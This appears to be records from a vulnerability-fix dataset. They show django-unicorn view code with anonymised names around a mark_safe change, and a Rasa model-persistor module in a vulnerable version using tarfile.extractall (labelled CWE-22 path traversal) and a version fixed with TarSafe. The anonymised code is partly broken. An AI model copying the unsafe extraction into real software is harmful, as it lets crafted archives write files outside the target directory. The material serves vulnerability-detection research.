" if isinstance(component.Meta.safe, Sequence):",
" for field_name in component.Meta.safe:",
" safe_fields.append(field_name)",
" value = getattr(component, field_name)",
" if isinstance(value, str):",
" setattr(component, field_name, mark_safe(value))"
],
"line_no": [
4,
9,
132,
133,
134,
136,
140,
141,
142
]
} | import copy
import logging
from functools import wraps
from typing import Dict
from django.core.cache import .caches
from django.http import HttpRequest, JsonResponse
from django.http.response import HttpResponseNotModified
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.http import require_POST
import orjson
from bs4 import BeautifulSoup
from django_unicorn.components import UnicornView
from django_unicorn.components.unicorn_template_response import get_root_element
from django_unicorn.decorators import timed
from django_unicorn.errors import RenderNotModified, UnicornCacheError, UnicornViewError
from django_unicorn.serializer import dumps, loads
from django_unicorn.settings import (
get_cache_alias,
get_serial_enabled,
get_serial_timeout,
)
from django_unicorn.utils import generate_checksum, get_cacheable_component
from django_unicorn.views.action_parsers import call_method, sync_input
from django_unicorn.views.objects import ComponentRequest
from django_unicorn.views.utils import set_property_from_data
VAR_0 = logging.getLogger(__name__)
VAR_0.setLevel(logging.DEBUG)
def FUNC_0(VAR_1):
def FUNC_5(*VAR_6, **VAR_7):
try:
return VAR_1(*VAR_6, **VAR_7)
except UnicornViewError as e:
return JsonResponse({"error": str(e)})
except RenderNotModified:
return HttpResponseNotModified()
except AssertionError as e:
return JsonResponse({"error": str(e)})
return wraps(VAR_1)(FUNC_5)
def FUNC_1(
VAR_2: HttpRequest, VAR_3: ComponentRequest
) -> Dict:
VAR_8 = UnicornView.create(
component_id=VAR_3.id,
VAR_4=VAR_3.name,
VAR_2=request,
)
VAR_9 = copy.deepcopy(VAR_3.data)
for (property_name, property_value) in VAR_3.data.items():
set_property_from_data(VAR_8, property_name, property_value)
VAR_8.hydrate()
VAR_10 = False
VAR_11 = False
VAR_12 = False
VAR_13 = None
VAR_14 = []
for action in VAR_3.action_queue:
if action.partial:
VAR_14.append(action.partial)
else:
VAR_14 = action.partials
if action.action_type == "syncInput":
sync_input.handle(VAR_3, VAR_8, action.payload)
elif action.action_type == "callMethod":
(
VAR_8,
VAR_38,
VAR_39,
VAR_40,
VAR_13,
) = call_method.handle(VAR_3, VAR_8, action.payload)
VAR_12 = is_refresh_called | VAR_38
VAR_11 = is_reset_called | VAR_39
VAR_10 = validate_all_fields | VAR_40
else:
raise UnicornViewError(f"Unknown action_type '{action.action_type}'")
VAR_8.complete()
VAR_3.data = orjson.loads(VAR_8.get_frontend_context_variables())
VAR_15 = VAR_3.data
if not VAR_11:
if not VAR_12:
VAR_15 = {}
for VAR_41, value in VAR_9.items():
if value != VAR_3.data.get(VAR_41):
VAR_15[VAR_41] = VAR_3.data.get(VAR_41)
if VAR_10:
VAR_8.validate()
else:
VAR_8.validate(model_names=list(VAR_15.keys()))
VAR_16 = VAR_8.render()
VAR_8.rendered(VAR_16)
VAR_17 = caches[get_cache_alias()]
try:
VAR_17.set(VAR_8.component_cache_key, get_cacheable_component(VAR_8))
except UnicornCacheError as e:
VAR_0.warning(e)
VAR_18 = []
if VAR_14 and all(VAR_14):
VAR_24 = BeautifulSoup(VAR_16, features="html.parser")
for partial in VAR_14:
VAR_33 = False
VAR_34 = False
VAR_35 = False
VAR_36 = partial.get("target")
if not VAR_36:
VAR_36 = partial.get("key")
if VAR_36:
VAR_35 = True
if not VAR_36:
VAR_36 = partial.get("id")
if VAR_36:
VAR_34 = True
assert VAR_36, "Partial VAR_36 is required"
if not VAR_34:
for element in VAR_24.find_all():
if (
"unicorn:key" in element.attrs
and element.attrs["unicorn:key"] == VAR_36
):
VAR_18.append({"key": VAR_36, "dom": str(element)})
VAR_33 = True
break
if not VAR_33 and not VAR_35:
for element in VAR_24.find_all():
if "id" in element.attrs and element.attrs["id"] == VAR_36:
VAR_18.append({"id": VAR_36, "dom": str(element)})
VAR_33 = True
break
VAR_19 = {
"id": VAR_3.id,
"data": VAR_15,
"errors": VAR_8.errors,
"calls": VAR_8.calls,
"checksum": generate_checksum(orjson.dumps(VAR_3.data)),
}
if VAR_18:
VAR_19.update({"partials": VAR_18})
else:
VAR_25 = generate_checksum(VAR_16)
if (
VAR_3.hash == VAR_25
and (not VAR_13 or not VAR_13.value)
and not VAR_8.calls
):
raise RenderNotModified()
VAR_24 = BeautifulSoup(VAR_16, features="html.parser")
VAR_16 = str(get_root_element(VAR_24))
VAR_19.update(
{"dom": VAR_16, "hash": VAR_25,}
)
if VAR_13:
VAR_19.update(
{"return": VAR_13.get_data(),}
)
if VAR_13.redirect:
VAR_19.update(
{"redirect": VAR_13.redirect,}
)
if VAR_13.poll:
VAR_19.update(
{"poll": VAR_13.poll,}
)
VAR_20 = VAR_8.parent
if VAR_20:
VAR_26 = loads(
VAR_20.get_frontend_context_variables()
)
VAR_27 = generate_checksum(dumps(VAR_26))
VAR_28 = {
"id": VAR_20.component_id,
"checksum": VAR_27,
}
if not VAR_18:
VAR_37 = VAR_20.render()
VAR_8.parent_rendered(VAR_37)
try:
VAR_17.set(
VAR_20.component_cache_key,
get_cacheable_component(VAR_20),
)
except UnicornCacheError as e:
VAR_0.warning(e)
VAR_28.update(
{
"dom": VAR_37,
"data": VAR_26,
"errors": VAR_20.errors,
}
)
VAR_19.update({"parent": VAR_28})
return VAR_19
def FUNC_2(
VAR_2: HttpRequest, VAR_3: ComponentRequest
) -> Dict:
if not get_serial_enabled():
return FUNC_1(VAR_2, VAR_3)
VAR_17 = caches[get_cache_alias()]
VAR_5 = f"unicorn:queue:{VAR_3.id}"
VAR_21 = VAR_17.get(VAR_5) or []
VAR_3.request = None
VAR_21.append(VAR_3)
VAR_17.set(
VAR_5, VAR_21, timeout=get_serial_timeout(),
)
if len(VAR_21) > 1:
VAR_29 = VAR_21[0].epoch
return {
"queued": True,
"epoch": VAR_3.epoch,
"original_epoch": VAR_29,
}
return FUNC_3(
VAR_2, VAR_3.name, VAR_5
)
def FUNC_3(
VAR_2: HttpRequest, VAR_4: str, VAR_5
) -> Dict:
VAR_17 = caches[get_cache_alias()]
VAR_21 = VAR_17.get(VAR_5)
if not VAR_21 or not isinstance(VAR_21, list):
raise UnicornViewError(f"No VAR_2 found for {VAR_5}")
VAR_21 = sorted(VAR_21, VAR_41=lambda r: r.epoch)
VAR_22 = VAR_21[0]
try:
VAR_30 = FUNC_1(VAR_2, VAR_22)
except RenderNotModified:
raise
finally:
VAR_21 = VAR_17.get(VAR_5)
if VAR_21:
component_requests.pop(0)
VAR_17.set(
VAR_5, VAR_21, timeout=get_serial_timeout(),
)
if VAR_21:
VAR_31 = None
for additional_component_request in copy.deepcopy(VAR_21):
if VAR_31:
VAR_31.action_queue.extend(
additional_component_request.action_queue
)
else:
VAR_31 = additional_component_request
for VAR_41, val in VAR_30.get("data", {}).items():
VAR_31.data[VAR_41] = val
VAR_21.pop(0)
VAR_17.set(
VAR_5, VAR_21, timeout=get_serial_timeout(),
)
VAR_32 = FUNC_2(
VAR_2, VAR_31
)
return VAR_32
return VAR_30
@timed
@FUNC_0
@csrf_protect
@require_POST
def FUNC_4(VAR_2: HttpRequest, VAR_4: str = None) -> JsonResponse:
assert VAR_4, "Missing VAR_8 name in url"
VAR_3 = ComponentRequest(VAR_2, VAR_4)
VAR_23 = FUNC_2(VAR_2, VAR_3)
return JsonResponse(VAR_23)
| import copy
import logging
from functools import wraps
from typing import Dict, Sequence
from django.core.cache import .caches
from django.http import HttpRequest, JsonResponse
from django.http.response import HttpResponseNotModified
from django.utils.safestring import mark_safe
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.http import require_POST
import orjson
from bs4 import BeautifulSoup
from django_unicorn.components import UnicornView
from django_unicorn.components.unicorn_template_response import get_root_element
from django_unicorn.decorators import timed
from django_unicorn.errors import RenderNotModified, UnicornCacheError, UnicornViewError
from django_unicorn.serializer import dumps, loads
from django_unicorn.settings import (
get_cache_alias,
get_serial_enabled,
get_serial_timeout,
)
from django_unicorn.utils import generate_checksum, get_cacheable_component
from django_unicorn.views.action_parsers import call_method, sync_input
from django_unicorn.views.objects import ComponentRequest
from django_unicorn.views.utils import set_property_from_data
VAR_0 = logging.getLogger(__name__)
VAR_0.setLevel(logging.DEBUG)
def FUNC_0(VAR_1):
def FUNC_5(*VAR_6, **VAR_7):
try:
return VAR_1(*VAR_6, **VAR_7)
except UnicornViewError as e:
return JsonResponse({"error": str(e)})
except RenderNotModified:
return HttpResponseNotModified()
except AssertionError as e:
return JsonResponse({"error": str(e)})
return wraps(VAR_1)(FUNC_5)
def FUNC_1(
VAR_2: HttpRequest, VAR_3: ComponentRequest
) -> Dict:
VAR_8 = UnicornView.create(
component_id=VAR_3.id,
VAR_4=VAR_3.name,
VAR_2=request,
)
VAR_9 = copy.deepcopy(VAR_3.data)
for (property_name, property_value) in VAR_3.data.items():
set_property_from_data(VAR_8, property_name, property_value)
VAR_8.hydrate()
VAR_10 = False
VAR_11 = False
VAR_12 = False
VAR_13 = None
VAR_14 = []
for action in VAR_3.action_queue:
if action.partial:
VAR_14.append(action.partial)
else:
VAR_14 = action.partials
if action.action_type == "syncInput":
sync_input.handle(VAR_3, VAR_8, action.payload)
elif action.action_type == "callMethod":
(
VAR_8,
VAR_40,
VAR_41,
VAR_42,
VAR_13,
) = call_method.handle(VAR_3, VAR_8, action.payload)
VAR_12 = is_refresh_called | VAR_40
VAR_11 = is_reset_called | VAR_41
VAR_10 = validate_all_fields | VAR_42
else:
raise UnicornViewError(f"Unknown action_type '{action.action_type}'")
VAR_8.complete()
VAR_3.data = orjson.loads(VAR_8.get_frontend_context_variables())
VAR_15 = []
if hasattr(VAR_8, "Meta") and hasattr(VAR_8.Meta, "safe"):
if isinstance(VAR_8.Meta.safe, Sequence):
for field_name in VAR_8.Meta.safe:
if field_name in VAR_8._attributes().keys():
VAR_15.append(field_name)
for field_name in VAR_15:
VAR_25 = getattr(VAR_8, field_name)
if isinstance(VAR_25, str):
setattr(VAR_8, field_name, mark_safe(VAR_25))
VAR_16 = VAR_3.data
if not VAR_11:
if not VAR_12:
VAR_16 = {}
for VAR_43, VAR_25 in VAR_9.items():
if VAR_25 != VAR_3.data.get(VAR_43):
VAR_16[VAR_43] = VAR_3.data.get(VAR_43)
if VAR_10:
VAR_8.validate()
else:
VAR_8.validate(model_names=list(VAR_16.keys()))
VAR_17 = VAR_8.render()
VAR_8.rendered(VAR_17)
VAR_18 = caches[get_cache_alias()]
try:
VAR_18.set(VAR_8.component_cache_key, get_cacheable_component(VAR_8))
except UnicornCacheError as e:
VAR_0.warning(e)
VAR_19 = []
if VAR_14 and all(VAR_14):
VAR_26 = BeautifulSoup(VAR_17, features="html.parser")
for partial in VAR_14:
VAR_35 = False
VAR_36 = False
VAR_37 = False
VAR_38 = partial.get("target")
if not VAR_38:
VAR_38 = partial.get("key")
if VAR_38:
VAR_37 = True
if not VAR_38:
VAR_38 = partial.get("id")
if VAR_38:
VAR_36 = True
assert VAR_38, "Partial VAR_38 is required"
if not VAR_36:
for element in VAR_26.find_all():
if (
"unicorn:key" in element.attrs
and element.attrs["unicorn:key"] == VAR_38
):
VAR_19.append({"key": VAR_38, "dom": str(element)})
VAR_35 = True
break
if not VAR_35 and not VAR_37:
for element in VAR_26.find_all():
if "id" in element.attrs and element.attrs["id"] == VAR_38:
VAR_19.append({"id": VAR_38, "dom": str(element)})
VAR_35 = True
break
VAR_20 = {
"id": VAR_3.id,
"data": VAR_16,
"errors": VAR_8.errors,
"calls": VAR_8.calls,
"checksum": generate_checksum(orjson.dumps(VAR_3.data)),
}
if VAR_19:
VAR_20.update({"partials": VAR_19})
else:
VAR_27 = generate_checksum(VAR_17)
if (
VAR_3.hash == VAR_27
and (not VAR_13 or not VAR_13.value)
and not VAR_8.calls
):
raise RenderNotModified()
VAR_26 = BeautifulSoup(VAR_17, features="html.parser")
VAR_17 = str(get_root_element(VAR_26))
VAR_20.update(
{"dom": VAR_17, "hash": VAR_27,}
)
if VAR_13:
VAR_20.update(
{"return": VAR_13.get_data(),}
)
if VAR_13.redirect:
VAR_20.update(
{"redirect": VAR_13.redirect,}
)
if VAR_13.poll:
VAR_20.update(
{"poll": VAR_13.poll,}
)
VAR_21 = VAR_8.parent
if VAR_21:
VAR_28 = loads(
VAR_21.get_frontend_context_variables()
)
VAR_29 = generate_checksum(dumps(VAR_28))
VAR_30 = {
"id": VAR_21.component_id,
"checksum": VAR_29,
}
if not VAR_19:
VAR_39 = VAR_21.render()
VAR_8.parent_rendered(VAR_39)
try:
VAR_18.set(
VAR_21.component_cache_key,
get_cacheable_component(VAR_21),
)
except UnicornCacheError as e:
VAR_0.warning(e)
VAR_30.update(
{
"dom": VAR_39,
"data": VAR_28,
"errors": VAR_21.errors,
}
)
VAR_20.update({"parent": VAR_30})
return VAR_20
def FUNC_2(
VAR_2: HttpRequest, VAR_3: ComponentRequest
) -> Dict:
if not get_serial_enabled():
return FUNC_1(VAR_2, VAR_3)
VAR_18 = caches[get_cache_alias()]
VAR_5 = f"unicorn:queue:{VAR_3.id}"
VAR_22 = VAR_18.get(VAR_5) or []
VAR_3.request = None
VAR_22.append(VAR_3)
VAR_18.set(
VAR_5, VAR_22, timeout=get_serial_timeout(),
)
if len(VAR_22) > 1:
VAR_31 = VAR_22[0].epoch
return {
"queued": True,
"epoch": VAR_3.epoch,
"original_epoch": VAR_31,
}
return FUNC_3(
VAR_2, VAR_3.name, VAR_5
)
def FUNC_3(
VAR_2: HttpRequest, VAR_4: str, VAR_5
) -> Dict:
VAR_18 = caches[get_cache_alias()]
VAR_22 = VAR_18.get(VAR_5)
if not VAR_22 or not isinstance(VAR_22, list):
raise UnicornViewError(f"No VAR_2 found for {VAR_5}")
VAR_22 = sorted(VAR_22, VAR_43=lambda r: r.epoch)
VAR_23 = VAR_22[0]
try:
VAR_32 = FUNC_1(VAR_2, VAR_23)
except RenderNotModified:
raise
finally:
VAR_22 = VAR_18.get(VAR_5)
if VAR_22:
component_requests.pop(0)
VAR_18.set(
VAR_5, VAR_22, timeout=get_serial_timeout(),
)
if VAR_22:
VAR_33 = None
for additional_component_request in copy.deepcopy(VAR_22):
if VAR_33:
VAR_33.action_queue.extend(
additional_component_request.action_queue
)
else:
VAR_33 = additional_component_request
for VAR_43, val in VAR_32.get("data", {}).items():
VAR_33.data[VAR_43] = val
VAR_22.pop(0)
VAR_18.set(
VAR_5, VAR_22, timeout=get_serial_timeout(),
)
VAR_34 = FUNC_2(
VAR_2, VAR_33
)
return VAR_34
return VAR_32
@timed
@FUNC_0
@csrf_protect
@require_POST
def FUNC_4(VAR_2: HttpRequest, VAR_4: str = None) -> JsonResponse:
assert VAR_4, "Missing VAR_8 name in url"
VAR_3 = ComponentRequest(VAR_2, VAR_4)
VAR_24 = FUNC_2(VAR_2, VAR_3)
return JsonResponse(VAR_24)
| [
5,
11,
14,
29,
30,
33,
34,
39,
49,
51,
52,
65,
69,
86,
87,
89,
90,
94,
100,
106,
117,
123,
125,
126,
128,
129,
131,
135,
139,
144,
147,
149,
154,
156,
159,
164,
166,
169,
172,
175,
178,
180,
190,
197,
205,
210,
217,
218,
221,
225,
230,
235,
240,
242,
244,
249,
254,
258,
266,
274,
276,
278,
279,
288,
292,
304,
307,
309,
310,
313,
314,
317,
321,
329,
333,
334,
343,
349,
362,
363,
365,
368,
371,
373,
376,
379,
381,
382,
388,
390,
392,
395,
399,
400,
401,
402,
403,
404,
407,
408,
411,
416,
420,
422,
424,
425,
434,
438,
450,
452,
455,
457,
36,
37,
38,
56,
57,
58,
59,
60,
61,
62,
63,
64,
65,
66,
67,
68,
69,
70,
71,
72,
73,
74,
75,
76,
77,
78,
79,
80,
283,
284,
285,
286,
287,
288,
289,
290,
291,
292,
293,
294,
295,
296,
297,
298,
299,
300,
301,
302,
303,
338,
339,
340,
341,
342,
343,
344,
345,
346,
347,
348,
349,
350,
351,
352,
353,
354,
355,
356,
357,
358,
359,
360,
431,
432,
433,
434,
435,
436,
437,
438,
439,
440,
441,
442,
443,
444,
445,
446,
447,
448,
449
] | [
5,
12,
15,
30,
31,
34,
35,
40,
50,
52,
53,
66,
70,
87,
88,
90,
91,
95,
101,
107,
118,
124,
126,
127,
129,
130,
137,
138,
143,
144,
146,
150,
154,
159,
162,
164,
169,
171,
174,
179,
181,
184,
187,
190,
193,
195,
205,
212,
220,
225,
232,
233,
236,
240,
245,
250,
255,
257,
259,
264,
269,
273,
281,
289,
291,
293,
294,
303,
307,
319,
322,
324,
325,
328,
329,
332,
336,
344,
348,
349,
358,
364,
377,
378,
380,
383,
386,
388,
391,
394,
396,
397,
403,
405,
407,
410,
414,
415,
416,
417,
418,
419,
422,
423,
426,
431,
435,
437,
439,
440,
449,
453,
465,
467,
470,
472,
37,
38,
39,
57,
58,
59,
60,
61,
62,
63,
64,
65,
66,
67,
68,
69,
70,
71,
72,
73,
74,
75,
76,
77,
78,
79,
80,
81,
298,
299,
300,
301,
302,
303,
304,
305,
306,
307,
308,
309,
310,
311,
312,
313,
314,
315,
316,
317,
318,
353,
354,
355,
356,
357,
358,
359,
360,
361,
362,
363,
364,
365,
366,
367,
368,
369,
370,
371,
372,
373,
374,
375,
446,
447,
448,
449,
450,
451,
452,
453,
454,
455,
456,
457,
458,
459,
460,
461,
462,
463,
464
] |
0CWE-22
| import abc
import logging
import os
import shutil
import tarfile
from typing import Optional, Text, Tuple, TYPE_CHECKING
import rasa.shared.utils.common
import rasa.utils.common
if TYPE_CHECKING:
from azure.storage.blob import ContainerClient
logger = logging.getLogger(__name__)
def get_persistor(name: Text) -> Optional["Persistor"]:
"""Returns an instance of the requested persistor.
Currently, `aws`, `gcs`, `azure` and providing module paths are supported remote
storages.
"""
if name == "aws":
return AWSPersistor(
os.environ.get("BUCKET_NAME"), os.environ.get("AWS_ENDPOINT_URL")
)
if name == "gcs":
return GCSPersistor(os.environ.get("BUCKET_NAME"))
if name == "azure":
return AzurePersistor(
os.environ.get("AZURE_CONTAINER"),
os.environ.get("AZURE_ACCOUNT_NAME"),
os.environ.get("AZURE_ACCOUNT_KEY"),
)
if name:
try:
persistor = rasa.shared.utils.common.class_from_module_path(name)
return persistor()
except ImportError:
raise ImportError(
f"Unknown model persistor {name}. Please make sure to "
"either use an included model persistor (`aws`, `gcs` "
"or `azure`) or specify the module path to an external "
"model persistor."
)
return None
class Persistor(abc.ABC):
"""Store models in cloud and fetch them when needed."""
def persist(self, model_directory: Text, model_name: Text) -> None:
"""Uploads a model persisted in the `target_dir` to cloud storage."""
if not os.path.isdir(model_directory):
raise ValueError(f"Target directory '{model_directory}' not found.")
file_key, tar_path = self._compress(model_directory, model_name)
self._persist_tar(file_key, tar_path)
def retrieve(self, model_name: Text, target_path: Text) -> None:
"""Downloads a model that has been persisted to cloud storage."""
tar_name = model_name
if not model_name.endswith("tar.gz"):
# ensure backward compatibility
tar_name = self._tar_name(model_name)
self._retrieve_tar(tar_name)
self._decompress(os.path.basename(tar_name), target_path)
@abc.abstractmethod
def _retrieve_tar(self, filename: Text) -> Text:
"""Downloads a model previously persisted to cloud storage."""
raise NotImplementedError
@abc.abstractmethod
def _persist_tar(self, filekey: Text, tarname: Text) -> None: # noqa: F841
"""Uploads a model persisted in the `target_dir` to cloud storage."""
raise NotImplementedError
def _compress(self, model_directory: Text, model_name: Text) -> Tuple[Text, Text]:
"""Creates a compressed archive and returns key and tar."""
import tempfile
dirpath = tempfile.mkdtemp()
base_name = self._tar_name(model_name, include_extension=False)
tar_name = shutil.make_archive(
os.path.join(dirpath, base_name),
"gztar",
root_dir=model_directory,
base_dir=".",
)
file_key = os.path.basename(tar_name)
return file_key, tar_name
@staticmethod
def _tar_name(model_name: Text, include_extension: bool = True) -> Text:
ext = ".tar.gz" if include_extension else ""
return f"{model_name}{ext}"
@staticmethod
def _decompress(compressed_path: Text, target_path: Text) -> None:
with tarfile.open(compressed_path, "r:gz") as tar:
tar.extractall(target_path) # target dir will be created if it not exists
class AWSPersistor(Persistor):
"""Store models on S3.
Fetches them when needed, instead of storing them on the local disk."""
def __init__(
self,
bucket_name: Text,
endpoint_url: Optional[Text] = None,
region_name: Optional[Text] = None,
) -> None:
import boto3
super().__init__()
self.s3 = boto3.resource(
"s3", endpoint_url=endpoint_url, region_name=region_name
)
self._ensure_bucket_exists(bucket_name, region_name)
self.bucket_name = bucket_name
self.bucket = self.s3.Bucket(bucket_name)
def _ensure_bucket_exists(
self, bucket_name: Text, region_name: Optional[Text] = None
) -> None:
import boto3
import botocore
if not region_name:
region_name = boto3.DEFAULT_SESSION.region_name
bucket_config = {"LocationConstraint": region_name}
# noinspection PyUnresolvedReferences
try:
self.s3.create_bucket(
Bucket=bucket_name, CreateBucketConfiguration=bucket_config
)
except botocore.exceptions.ClientError:
pass # bucket already exists
def _persist_tar(self, file_key: Text, tar_path: Text) -> None:
"""Uploads a model persisted in the `target_dir` to s3."""
with open(tar_path, "rb") as f:
self.s3.Object(self.bucket_name, file_key).put(Body=f)
def _retrieve_tar(self, model_path: Text) -> None:
"""Downloads a model that has previously been persisted to s3."""
tar_name = os.path.basename(model_path)
with open(tar_name, "wb") as f:
self.bucket.download_fileobj(model_path, f)
class GCSPersistor(Persistor):
"""Store models on Google Cloud Storage.
Fetches them when needed, instead of storing them on the local disk."""
def __init__(self, bucket_name: Text) -> None:
from google.cloud import storage
super().__init__()
self.storage_client = storage.Client()
self._ensure_bucket_exists(bucket_name)
self.bucket_name = bucket_name
self.bucket = self.storage_client.bucket(bucket_name)
def _ensure_bucket_exists(self, bucket_name: Text) -> None:
from google.cloud import exceptions
try:
self.storage_client.create_bucket(bucket_name)
except exceptions.Conflict:
# bucket exists
pass
def _persist_tar(self, file_key: Text, tar_path: Text) -> None:
"""Uploads a model persisted in the `target_dir` to GCS."""
blob = self.bucket.blob(file_key)
blob.upload_from_filename(tar_path)
def _retrieve_tar(self, target_filename: Text) -> None:
"""Downloads a model that has previously been persisted to GCS."""
blob = self.bucket.blob(target_filename)
blob.download_to_filename(target_filename)
class AzurePersistor(Persistor):
"""Store models on Azure"""
def __init__(
self, azure_container: Text, azure_account_name: Text, azure_account_key: Text
) -> None:
from azure.storage.blob import BlobServiceClient
super().__init__()
self.blob_service = BlobServiceClient(
account_url=f"https://{azure_account_name}.blob.core.windows.net/",
credential=azure_account_key,
)
self._ensure_container_exists(azure_container)
self.container_name = azure_container
def _ensure_container_exists(self, container_name: Text) -> None:
from azure.core.exceptions import ResourceExistsError
try:
self.blob_service.create_container(container_name)
except ResourceExistsError:
# no need to create the container, it already exists
pass
def _container_client(self) -> "ContainerClient":
return self.blob_service.get_container_client(self.container_name)
def _persist_tar(self, file_key: Text, tar_path: Text) -> None:
"""Uploads a model persisted in the `target_dir` to Azure."""
with open(tar_path, "rb") as data:
self._container_client().upload_blob(name=file_key, data=data)
def _retrieve_tar(self, target_filename: Text) -> None:
"""Downloads a model that has previously been persisted to Azure."""
blob_client = self._container_client().get_blob_client(target_filename)
with open(target_filename, "wb") as blob:
download_stream = blob_client.download_blob()
blob.write(download_stream.readall())
| import abc
import logging
import os
import shutil
from tarsafe import TarSafe
from typing import Optional, Text, Tuple, TYPE_CHECKING
import rasa.shared.utils.common
import rasa.utils.common
if TYPE_CHECKING:
from azure.storage.blob import ContainerClient
logger = logging.getLogger(__name__)
def get_persistor(name: Text) -> Optional["Persistor"]:
"""Returns an instance of the requested persistor.
Currently, `aws`, `gcs`, `azure` and providing module paths are supported remote
storages.
"""
if name == "aws":
return AWSPersistor(
os.environ.get("BUCKET_NAME"), os.environ.get("AWS_ENDPOINT_URL")
)
if name == "gcs":
return GCSPersistor(os.environ.get("BUCKET_NAME"))
if name == "azure":
return AzurePersistor(
os.environ.get("AZURE_CONTAINER"),
os.environ.get("AZURE_ACCOUNT_NAME"),
os.environ.get("AZURE_ACCOUNT_KEY"),
)
if name:
try:
persistor = rasa.shared.utils.common.class_from_module_path(name)
return persistor()
except ImportError:
raise ImportError(
f"Unknown model persistor {name}. Please make sure to "
"either use an included model persistor (`aws`, `gcs` "
"or `azure`) or specify the module path to an external "
"model persistor."
)
return None
class Persistor(abc.ABC):
"""Store models in cloud and fetch them when needed."""
def persist(self, model_directory: Text, model_name: Text) -> None:
"""Uploads a model persisted in the `target_dir` to cloud storage."""
if not os.path.isdir(model_directory):
raise ValueError(f"Target directory '{model_directory}' not found.")
file_key, tar_path = self._compress(model_directory, model_name)
self._persist_tar(file_key, tar_path)
def retrieve(self, model_name: Text, target_path: Text) -> None:
"""Downloads a model that has been persisted to cloud storage."""
tar_name = model_name
if not model_name.endswith("tar.gz"):
# ensure backward compatibility
tar_name = self._tar_name(model_name)
self._retrieve_tar(tar_name)
self._decompress(os.path.basename(tar_name), target_path)
@abc.abstractmethod
def _retrieve_tar(self, filename: Text) -> Text:
"""Downloads a model previously persisted to cloud storage."""
raise NotImplementedError
@abc.abstractmethod
def _persist_tar(self, filekey: Text, tarname: Text) -> None: # noqa: F841
"""Uploads a model persisted in the `target_dir` to cloud storage."""
raise NotImplementedError
def _compress(self, model_directory: Text, model_name: Text) -> Tuple[Text, Text]:
"""Creates a compressed archive and returns key and tar."""
import tempfile
dirpath = tempfile.mkdtemp()
base_name = self._tar_name(model_name, include_extension=False)
tar_name = shutil.make_archive(
os.path.join(dirpath, base_name),
"gztar",
root_dir=model_directory,
base_dir=".",
)
file_key = os.path.basename(tar_name)
return file_key, tar_name
@staticmethod
def _tar_name(model_name: Text, include_extension: bool = True) -> Text:
ext = ".tar.gz" if include_extension else ""
return f"{model_name}{ext}"
@staticmethod
def _decompress(compressed_path: Text, target_path: Text) -> None:
with TarSafe.open(compressed_path, "r:gz") as tar:
tar.extractall(target_path) # target dir will be created if it not exists
class AWSPersistor(Persistor):
"""Store models on S3.
Fetches them when needed, instead of storing them on the local disk."""
def __init__(
self,
bucket_name: Text,
endpoint_url: Optional[Text] = None,
region_name: Optional[Text] = None,
) -> None:
import boto3
super().__init__()
self.s3 = boto3.resource(
"s3", endpoint_url=endpoint_url, region_name=region_name
)
self._ensure_bucket_exists(bucket_name, region_name)
self.bucket_name = bucket_name
self.bucket = self.s3.Bucket(bucket_name)
def _ensure_bucket_exists(
self, bucket_name: Text, region_name: Optional[Text] = None
) -> None:
import boto3
import botocore
if not region_name:
region_name = boto3.DEFAULT_SESSION.region_name
bucket_config = {"LocationConstraint": region_name}
# noinspection PyUnresolvedReferences
try:
self.s3.create_bucket(
Bucket=bucket_name, CreateBucketConfiguration=bucket_config
)
except botocore.exceptions.ClientError:
pass # bucket already exists
def _persist_tar(self, file_key: Text, tar_path: Text) -> None:
"""Uploads a model persisted in the `target_dir` to s3."""
with open(tar_path, "rb") as f:
self.s3.Object(self.bucket_name, file_key).put(Body=f)
def _retrieve_tar(self, model_path: Text) -> None:
"""Downloads a model that has previously been persisted to s3."""
tar_name = os.path.basename(model_path)
with open(tar_name, "wb") as f:
self.bucket.download_fileobj(model_path, f)
class GCSPersistor(Persistor):
"""Store models on Google Cloud Storage.
Fetches them when needed, instead of storing them on the local disk."""
def __init__(self, bucket_name: Text) -> None:
from google.cloud import storage
super().__init__()
self.storage_client = storage.Client()
self._ensure_bucket_exists(bucket_name)
self.bucket_name = bucket_name
self.bucket = self.storage_client.bucket(bucket_name)
def _ensure_bucket_exists(self, bucket_name: Text) -> None:
from google.cloud import exceptions
try:
self.storage_client.create_bucket(bucket_name)
except exceptions.Conflict:
# bucket exists
pass
def _persist_tar(self, file_key: Text, tar_path: Text) -> None:
"""Uploads a model persisted in the `target_dir` to GCS."""
blob = self.bucket.blob(file_key)
blob.upload_from_filename(tar_path)
def _retrieve_tar(self, target_filename: Text) -> None:
"""Downloads a model that has previously been persisted to GCS."""
blob = self.bucket.blob(target_filename)
blob.download_to_filename(target_filename)
class AzurePersistor(Persistor):
"""Store models on Azure"""
def __init__(
self, azure_container: Text, azure_account_name: Text, azure_account_key: Text
) -> None:
from azure.storage.blob import BlobServiceClient
super().__init__()
self.blob_service = BlobServiceClient(
account_url=f"https://{azure_account_name}.blob.core.windows.net/",
credential=azure_account_key,
)
self._ensure_container_exists(azure_container)
self.container_name = azure_container
def _ensure_container_exists(self, container_name: Text) -> None:
from azure.core.exceptions import ResourceExistsError
try:
self.blob_service.create_container(container_name)
except ResourceExistsError:
# no need to create the container, it already exists
pass
def _container_client(self) -> "ContainerClient":
return self.blob_service.get_container_client(self.container_name)
def _persist_tar(self, file_key: Text, tar_path: Text) -> None:
"""Uploads a model persisted in the `target_dir` to Azure."""
with open(tar_path, "rb") as data:
self._container_client().upload_blob(name=file_key, data=data)
def _retrieve_tar(self, target_filename: Text) -> None:
"""Downloads a model that has previously been persisted to Azure."""
blob_client = self._container_client().get_blob_client(target_filename)
with open(target_filename, "wb") as blob:
download_stream = blob_client.download_blob()
blob.write(download_stream.readall())
| path_disclosure | {
"code": [
"import tarfile",
" with tarfile.open(compressed_path, \"r:gz\") as tar:"
],
"line_no": [
5,
106
]
} | {
"code": [
"from tarsafe import TarSafe",
" with TarSafe.open(compressed_path, \"r:gz\") as tar:"
],
"line_no": [
5,
106
]
} | import abc
import logging
import os
import shutil
import tarfile
from typing import Optional, Text, Tuple, TYPE_CHECKING
import rasa.shared.utils.common
import rasa.utils.common
if TYPE_CHECKING:
from azure.storage.blob import ContainerClient
VAR_0 = logging.getLogger(__name__)
def FUNC_0(VAR_1: Text) -> Optional["Persistor"]:
if VAR_1 == "aws":
return CLASS_1(
os.environ.get("BUCKET_NAME"), os.environ.get("AWS_ENDPOINT_URL")
)
if VAR_1 == "gcs":
return CLASS_2(os.environ.get("BUCKET_NAME"))
if VAR_1 == "azure":
return CLASS_3(
os.environ.get("AZURE_CONTAINER"),
os.environ.get("AZURE_ACCOUNT_NAME"),
os.environ.get("AZURE_ACCOUNT_KEY"),
)
